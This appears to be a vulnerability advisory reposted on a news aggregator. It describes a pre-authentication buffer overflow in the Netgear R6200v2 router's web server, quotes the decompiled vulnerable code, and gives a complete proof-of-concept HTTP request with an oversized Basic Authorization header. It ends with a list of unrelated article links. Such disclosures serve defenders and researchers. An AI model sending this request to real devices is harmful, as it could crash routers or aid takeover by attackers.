当前位置: 首页 > news >正文

NETGEAR R6200v2 has an unauthorized memory corruption vulnerability.

Description

A pre-authentication global buffer overflow vulnerability exists in the web server component of the Netgear R6200v2 router. The issue resides within the sub_ED50 function during the processing of HTTP Authorization headers. The server extracts the Base64-encoded authentication string and performs an in-place decoding via the base64decode utility, which lacks boundary checks. Subsequently, the decoded username is copied into a fixed-size 24-byte global buffer (byte_254FFC) using the unsafe strcpy function. By providing a specially crafted credentials string, an unauthenticated attacker can overflow this buffer to overwrite adjacent critical variables and pointers in the .bss segment, such as the dword_255020 URL pointer. This memory corruption can be leveraged to achieve arbitrary code execution or cause a denial-of-service condition on the affected device.

/* Vulnerability Location: sub_ED50 in httpd */

// 1. Taint Source: Extracting the Base64 encoded credentials from the Authorization header
v43 = stristr(v18, "Authorization: Basic ");
v39 = v43 + 21;

// 2. Unsafe Transformation: Decoding the taint without any length or boundary checks
base64decode(v39);

// 3. Taint Separation: Locating the colon separator to isolate the username
v46 = strchr(v39, 58); // Find ':' (ASCII 58)
if ( v46 )
{
*v46 = 0; // Null-terminate the username part

// 4. Vulnerable Sink: Unsafe strcpy into a fixed-size global buffer
// byte_254FFC is allocated only 24 bytes (0x18) in the .bss segment
strcpy(byte_254FFC, v39); 

}

POC

GET /start.htm HTTP/1.1
Host: 192.168.1.1
Cache-Control: max-age=0
Authorization: Basic YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhOmJiYmJiYmJiYg==
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.1/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

http://www.jsqmd.com/news/279864/

相关文章:

  • 2026杭州公司注册代办服务解析:合规高效解决方案
  • 食品异物检测设备市场格局与技术路径解析
  • 数据结构和算法的学习路径
  • 纪念品优质厂家推荐:2026年钥匙扣、金属徽章、冰箱贴TOP榜单
  • 2026合同管理系统怎么选择?关键要点解析
  • 2026工业吸尘器十大品牌:技术与服务综合评测
  • 基于Python+Django的博客系统源码文档部署文档代码讲解等
  • 2026合同管理软件选型:全流程工具应用盘点
  • 2026合同管理软件选型:全流程工具应用盘点
  • 热销榜单:2026年重庆值得信赖的预应力配件品牌推荐
  • 2026高温炉厂家哪家好?行业技术与服务深度解析
  • 2026 真发定制品牌权威榜单 从产能品控到个性化服务的全维度采购指南与参考手册
  • 2026年合同管理系统选型推荐榜单及功能特性解析
  • 热销榜单:2026年重庆钢绞线供应厂家TOP8推荐,助你选择可靠钢绞线销售厂家
  • 2026工业吸尘器品牌推荐:聚焦高效清洁解决方案
  • idea中git比对已提交的文件全是空格解决办法
  • 2026高温炉品牌对比:技术与服务综合分析
  • 2026年驼奶粉品牌/功效/排名/价格/推荐榜:聚焦奶源工艺与市场口碑,优选营养健康新选择
  • 基于python的个性化音乐推荐系统的设计与实现-计算机毕业设计源码+无LW文档
  • 【模电】运放专题笔记
  • 基于STM32智能光控窗帘系统设计(仿真、程序)
  • 深圳做谷歌独立站代运营哪家强?昊客网络凭技术实力跻身行业前十
  • 《智能缓冲调度:文件I/O异步处理的底层实战指南》
  • 基于单片机智能充电器系统设计(仿真 程序 论文)
  • LLM用动态提示防兽医误诊,准确率稳
  • iPhone照片放大就糊?别再怪像素低了!教你3个神仙技巧,细节清晰到数睫毛
  • 基于单片机电磁流量计模拟仿真设计(仿真、程序、bom)
  • 2026陕西建筑加固厂家口碑榜陕西佳达98%好评,真实用户实测推荐
  • 2026年污水流量计优选:实力厂家打造优质产品,涡街流量计/温度变送器/文丘里/环形孔板,污水流量计公司联系电话
  • 拒绝多微信内耗|所有账号聚合管理,再也不用反复切号